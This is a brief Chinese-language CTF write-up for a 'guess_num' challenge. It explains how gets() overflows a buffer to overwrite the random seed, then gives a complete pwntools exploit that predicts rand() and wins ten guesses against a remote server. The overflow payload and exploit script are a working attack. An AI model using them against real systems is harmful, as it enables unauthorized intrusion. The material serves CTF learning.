0x00 file
和checksec
0x01 ida查看
- 程序基本逻辑是生成随机数,然后猜,连续猜中
10
次便可得到flag
- 发现
v7
使用了gets
危险函数,而且可以覆盖seed
- 所以就有了思路,
seed
能够被控制的话,那随机数也就相当于可以控制了,具体的可以查看srand
、rand
、seed
的关系
0x02 完整exp
from pwn import *
from ctypes import *
local=0
pc='./guess_num'
aslr=True
context.log_level=True
context.terminal = ["deepin-terminal","-x","sh","-c"]
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
if local==1:
#p = process(pc,aslr=aslr,env={'LD_PRELOAD': './libc.so.6'})
p = process(pc,aslr=aslr)
# gdb.attach(p,'c')
else:
remote_addr=['111.198.29.45', 45968]
p=remote(remote_addr[0],remote_addr[1])
ru = lambda x : p.recvuntil(x)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
def lg(s,addr):
print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
def raddr(a=6):
if(a==6):
return u64(rv(a).ljust(8,'\x00'))
else:
return u64(rl().strip('\n').ljust(8,'\x00'))
if __name__ == '__main__':
payload = ''
payload += 'A'*0x20
payload += p64(1)
sla('Your name:', payload)
for i in range(0,10):
num = str(libc.rand()%6+1)
sla('number:', num)
p.interactive()
0x03 结果